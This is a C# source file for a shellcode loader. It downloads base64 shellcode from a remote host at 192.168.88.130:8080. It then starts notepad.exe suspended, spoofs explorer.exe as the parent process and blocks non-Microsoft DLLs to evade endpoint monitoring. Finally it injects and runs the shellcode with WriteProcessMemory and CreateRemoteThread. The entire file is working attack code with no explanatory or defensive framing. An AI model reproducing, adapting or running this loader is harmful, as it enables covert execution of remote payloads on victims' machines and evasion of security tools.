using System; using System.IO; using System.Net; using System.Diagnostics; using System.IO.Compression; using System.Runtime.InteropServices; public class Payload { public Payload() { var processInfo = CreateTargetProcess(@"C:\Windows\System32\notepad.exe"); var shellcode = GetShellcode("http://192.168.88.130:8080/shellcode.txt"); Inject(processInfo, shellcode); } public static Win32.PROCESS_INFORMATION CreateTargetProcess(string targetProcess) { var startInfoEx = new Win32.STARTUPINFOEX(); var processInfo = new Win32.PROCESS_INFORMATION(); startInfoEx.StartupInfo.cb = (uint)Marshal.SizeOf(startInfoEx); var lpValue = Marshal.AllocHGlobal(IntPtr.Size); try { var processSecurity = new Win32.SECURITY_ATTRIBUTES(); var threadSecurity = new Win32.SECURITY_ATTRIBUTES(); processSecurity.nLength = Marshal.SizeOf(processSecurity); threadSecurity.nLength = Marshal.SizeOf(threadSecurity); var lpSize = IntPtr.Zero; Win32.InitializeProcThreadAttributeList(IntPtr.Zero, 2, 0, ref lpSize); startInfoEx.lpAttributeList = Marshal.AllocHGlobal(lpSize); Win32.InitializeProcThreadAttributeList(startInfoEx.lpAttributeList, 2, 0, ref lpSize); // If we are x86 use this instead // Marshal.WriteIntPtr(lpValue, new IntPtr(unchecked((uint)Win32.BinarySignaturePolicy.BLOCK_NON_MICROSOFT_BINARIES_ALLOW_STORE))); Marshal.WriteIntPtr(lpValue, new IntPtr((long)Win32.BinarySignaturePolicy.BLOCK_NON_MICROSOFT_BINARIES_ALLOW_STORE)); Win32.UpdateProcThreadAttribute( startInfoEx.lpAttributeList, 0, (IntPtr)Win32.ProcThreadAttribute.MITIGATION_POLICY, lpValue, (IntPtr)IntPtr.Size, IntPtr.Zero, IntPtr.Zero ); var parentHandle = Process.GetProcessesByName("explorer")[0].Handle; lpValue = Marshal.AllocHGlobal(IntPtr.Size); Marshal.WriteIntPtr(lpValue, parentHandle); Win32.UpdateProcThreadAttribute( startInfoEx.lpAttributeList, 0, (IntPtr)Win32.ProcThreadAttribute.PARENT_PROCESS, lpValue, (IntPtr)IntPtr.Size, IntPtr.Zero, IntPtr.Zero ); Win32.CreateProcess( targetProcess, null, ref processSecurity, ref threadSecurity, false, Win32.CreationFlags.ExtendedStartupInfoPresent | Win32.CreationFlags.CreateSuspended, IntPtr.Zero, null, ref startInfoEx, out processInfo ); } catch (Exception e) { Console.Error.WriteLine(e.StackTrace); } finally { Win32.DeleteProcThreadAttributeList(startInfoEx.lpAttributeList); Marshal.FreeHGlobal(startInfoEx.lpAttributeList); Marshal.FreeHGlobal(lpValue); Console.WriteLine("{0} started", processInfo.dwProcessId); } return processInfo; } public static void Inject(Win32.PROCESS_INFORMATION targetProcess, byte[] shellcode) { var allocatedRegion = Win32.VirtualAllocEx(targetProcess.hProcess, IntPtr.Zero, (uint)shellcode.Length, Win32.AllocationType.Commit | Win32.AllocationType.Reserve, Win32.MemoryProtection.ReadWrite); UIntPtr bytesWritten; Win32.WriteProcessMemory(targetProcess.hProcess, allocatedRegion, shellcode, (uint)shellcode.Length, out bytesWritten); Win32.MemoryProtection oldProtect; Win32.VirtualProtectEx(targetProcess.hProcess, allocatedRegion, (uint)shellcode.Length, Win32.MemoryProtection.ExecuteRead, out oldProtect); Win32.CreateRemoteThread(targetProcess.hProcess, IntPtr.Zero, 0, allocatedRegion, IntPtr.Zero, 0, IntPtr.Zero); } public static byte[] GetShellcode(string url) { WebClient client = new WebClient(); client.Proxy = WebRequest.GetSystemWebProxy(); client.Proxy.Credentials = CredentialCache.DefaultCredentials; string compressedEncodedShellcode = client.DownloadString(url); return Convert.FromBase64String(compressedEncodedShellcode); } } public class Win32 { [DllImport("kernel32.dll", SetLastError = true)] public static extern bool InitializeProcThreadAttributeList(IntPtr lpAttributeList, int dwAttributeCount, int dwFlags, ref IntPtr lpSize); [DllImport("kernel32.dll", SetLastError = true)] public static extern bool UpdateProcThreadAttribute(IntPtr lpAttributeList, uint dwFlags, IntPtr Attribute, IntPtr lpValue, IntPtr cbSize, IntPtr lpPreviousValue, IntPtr lpReturnSize); [DllImport("kernel32.dll")] public static extern bool CreateProcess(string lpApplicationName, string lpCommandLine, ref SECURITY_ATTRIBUTES lpProcessAttributes, ref SECURITY_ATTRIBUTES lpThreadAttributes, bool bInheritHandles, CreationFlags dwCreationFlags, IntPtr lpEnvironment, string lpCurrentDirectory, [In] ref STARTUPINFOEX lpStartupInfo, out PROCESS_INFORMATION lpProcessInformation); [DllImport("kernel32.dll", SetLastError = true)] public static extern bool DeleteProcThreadAttributeList(IntPtr lpAttributeList); [DllImport("kernel32.dll")] public static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, uint dwSize, AllocationType flAllocationType, MemoryProtection flProtect); [DllImport("kernel32.dll", SetLastError = true)] public static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, uint nSize, out UIntPtr lpNumberOfBytesWritten); [DllImport("kernel32.dll")] public static extern bool VirtualProtectEx(IntPtr hProcess, IntPtr lpAddress, uint dwSize, MemoryProtection flNewProtect, out MemoryProtection lpflOldProtect); [DllImport("kernel32.dll", SetLastError = true, CallingConvention = CallingConvention.StdCall)] public static extern IntPtr CreateRemoteThread(IntPtr hProcess, IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId); [StructLayout(LayoutKind.Sequential)] public struct PROCESS_INFORMATION { public IntPtr hProcess; public IntPtr hThread; public int dwProcessId; public int dwThreadId; } [StructLayout(LayoutKind.Sequential)] public struct STARTUPINFO { public uint cb; public IntPtr lpReserved; public IntPtr lpDesktop; public IntPtr lpTitle; public uint dwX; public uint dwY; public uint dwXSize; public uint dwYSize; public uint dwXCountChars; public uint dwYCountChars; public uint dwFillAttributes; public uint dwFlags; public ushort wShowWindow; public ushort cbReserved; public IntPtr lpReserved2; public IntPtr hStdInput; public IntPtr hStdOutput; public IntPtr hStdErr; } [StructLayout(LayoutKind.Sequential)] public struct STARTUPINFOEX { public STARTUPINFO StartupInfo; public IntPtr lpAttributeList; } [StructLayout(LayoutKind.Sequential)] public struct SECURITY_ATTRIBUTES { public int nLength; public IntPtr lpSecurityDescriptor; public int bInheritHandle; } [Flags] public enum ProcThreadAttribute : int { MITIGATION_POLICY = 0x20007, PARENT_PROCESS = 0x00020000 } [Flags] public enum BinarySignaturePolicy : ulong { BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON = 0x100000000000, BLOCK_NON_MICROSOFT_BINARIES_ALLOW_STORE = 0x300000000000 } [Flags] public enum CreationFlags : uint { CreateSuspended = 0x00000004, DetachedProcess = 0x00000008, CreateNoWindow = 0x08000000, ExtendedStartupInfoPresent = 0x00080000 } [Flags] public enum AllocationType { Commit = 0x1000, Reserve = 0x2000, Decommit = 0x4000, Release = 0x8000, Reset = 0x80000, Physical = 0x400000, TopDown = 0x100000, WriteWatch = 0x200000, LargePages = 0x20000000 } [Flags] public enum MemoryProtection { Execute = 0x10, ExecuteRead = 0x20, ExecuteReadWrite = 0x40, ExecuteWriteCopy = 0x80, NoAccess = 0x01, ReadOnly = 0x02, ReadWrite = 0x04, WriteCopy = 0x08, GuardModifierflag = 0x100, NoCacheModifierflag = 0x200, WriteCombineModifierflag = 0x400 } }